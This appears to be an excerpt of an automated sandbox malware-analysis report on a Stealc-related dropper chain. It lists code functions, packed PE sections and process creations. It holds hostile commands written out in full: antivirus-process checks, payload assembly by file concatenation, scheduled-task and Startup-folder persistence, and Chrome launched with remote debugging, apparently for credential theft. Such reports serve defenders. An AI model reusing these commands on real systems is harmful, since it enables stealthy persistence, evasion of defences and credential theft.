                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C9A3FC017_2_6C9A3FC0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8CBFF017_2_6C8CBFF0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C855F2017_2_6C855F20
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C815F3017_2_6C815F30
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C977F2017_2_6C977F20
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C82D8E017_2_6C82D8E0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8538E017_2_6C8538E0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C97B8F017_2_6C97B8F0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8FF8F017_2_6C8FF8F0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C87D81017_2_6C87D810
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C83198017_2_6C831980
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8F199017_2_6C8F1990
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8B99C017_2_6C8B99C0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8599D017_2_6C8599D0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8859F017_2_6C8859F0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8B79F017_2_6C8B79F0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C96F90017_2_6C96F900
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8D592017_2_6C8D5920
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C89F96017_2_6C89F960
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8DD96017_2_6C8DD960
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8FDAB017_2_6C8FDAB0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C821AE017_2_6C821AE0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C85FA1017_2_6C85FA10
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C91DA3017_2_6C91DA30
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C9A9A5017_2_6C9A9A50
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C905B9017_2_6C905B90
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C811B8017_2_6C811B80
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C879BA017_2_6C879BA0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C8E9BB017_2_6C8E9BB0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C867BF017_2_6C867BF0
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C86BB2017_2_6C86BB20
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\LgAmARwZ\Application.exe 8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: String function: 007745C0 appears 316 times
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: String function: 6C849B10 appears 92 times
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: String function: 6C959F30 appears 32 times
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: String function: 6C87C5E0 appears 35 times
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: String function: 6C843620 appears 91 times
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: random[1].exe0.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: f55899dae2.exe.13.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Application.exe.33.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: file.exeStatic PE information: Section: ZLIB complexity 0.9973443886239782
                          Source: file.exeStatic PE information: Section: mahfbdtk ZLIB complexity 0.9942348008385744
                          Source: axplong.exe.6.drStatic PE information: Section: ZLIB complexity 0.9973443886239782
                          Source: axplong.exe.6.drStatic PE information: Section: mahfbdtk ZLIB complexity 0.9942348008385744
                          Source: random[2].exe.13.drStatic PE information: Section: cbbjugzk ZLIB complexity 0.9947032003238927
                          Source: c8908bf20d.exe.13.drStatic PE information: Section: cbbjugzk ZLIB complexity 0.9947032003238927
                          Source: random[1].exe.13.drStatic PE information: Section: ZLIB complexity 0.9981081014890282
                          Source: 2dc588f7b5.exe.13.drStatic PE information: Section: ZLIB complexity 0.9981081014890282
                          Source: random[1].exe1.13.drStatic PE information: Section: ZLIB complexity 0.9982611677115988
                          Source: 550b7cfe5f.exe.13.drStatic PE information: Section: ZLIB complexity 0.9982611677115988
                          Source: GOLD1234[1].exe.13.drStatic PE information: Section: .call ZLIB complexity 1.0003314936926606
                          Source: GOLD1234.exe.13.drStatic PE information: Section: .call ZLIB complexity 1.0003314936926606
                          Source: shop[1].exe.13.drStatic PE information: Section: .bss ZLIB complexity 1.0003314936926606
                          Source: shop.exe.13.drStatic PE information: Section: .bss ZLIB complexity 1.0003314936926606
                          Source: AAKAL78BRQNYOCIR09Y.exe.22.drStatic PE information: Section: ZLIB complexity 0.9982012091280654
                          Source: AAKAL78BRQNYOCIR09Y.exe.22.drStatic PE information: Section: edfilslq ZLIB complexity 0.9943063624437781
                          Source: 550b7cfe5f.exe.13.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: random[1].exe1.13.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                          Source: 33.2.f55899dae2.exe.1c770000.2.raw.unpack, searchX64LPVOIDhierarchy.csCryptographic APIs: 'CreateDecryptor'
                          Source: 33.0.f55899dae2.exe.59408e.1.raw.unpack, searchX64LPVOIDhierarchy.csCryptographic APIs: 'CreateDecryptor'
                          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@93/82@0/13
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_6C880300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,17_2_6C880300
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00789600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,17_2_00789600
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00783720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,17_2_00783720
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exeJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7212:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3824:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeMutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user~1\AppData\Local\Temp\44111dbc49Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
                          Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                          Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeFile read: C:\Windows\System32\drivers\etc\hosts
                          Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: chrome.exe, 0000002B.00000002.2761183199.00002B3C00647000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                          Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: stealc_default2.exe, stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                          Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: stealc_default2.exe, 00000011.00000003.1991864231.0000000021219000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000003.2002738966.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000003.2002297977.0000000021234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2177217810.0000000003E1A000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2208966431.0000000003E06000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2209594821.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2179336471.0000000003DFC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2346026988.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2377327130.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461754759.0000000005855000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: file.exeReversingLabs: Detection: 50%
                          Source: file.exeVirustotal: Detection: 47%
                          Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: axplong.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                          Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                          Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe"
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe"
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user~1\AppData\Local\Temp\1000828001\new_v8.exe"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe "C:\Users\user~1\AppData\Local\Temp\1000833001\f55899dae2.exe"
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe "C:\Users\user~1\AppData\Local\Temp\1000857001\550b7cfe5f.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                          Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user~1\AppData\Local\Temp\1000965001\GOLD1234.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user~1\AppData\Local\Temp\1001096001\RDX123456.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user~1\AppData\Local\Temp\1000828001\new_v8.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe "C:\Users\user~1\AppData\Local\Temp\1000833001\f55899dae2.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exe "C:\Users\user~1\AppData\Local\Temp\1000857001\550b7cfe5f.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user~1\AppData\Local\Temp\1000965001\GOLD1234.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user~1\AppData\Local\Temp\1001096001\RDX123456.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: unknown unknownJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeProcess created: unknown unknown
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
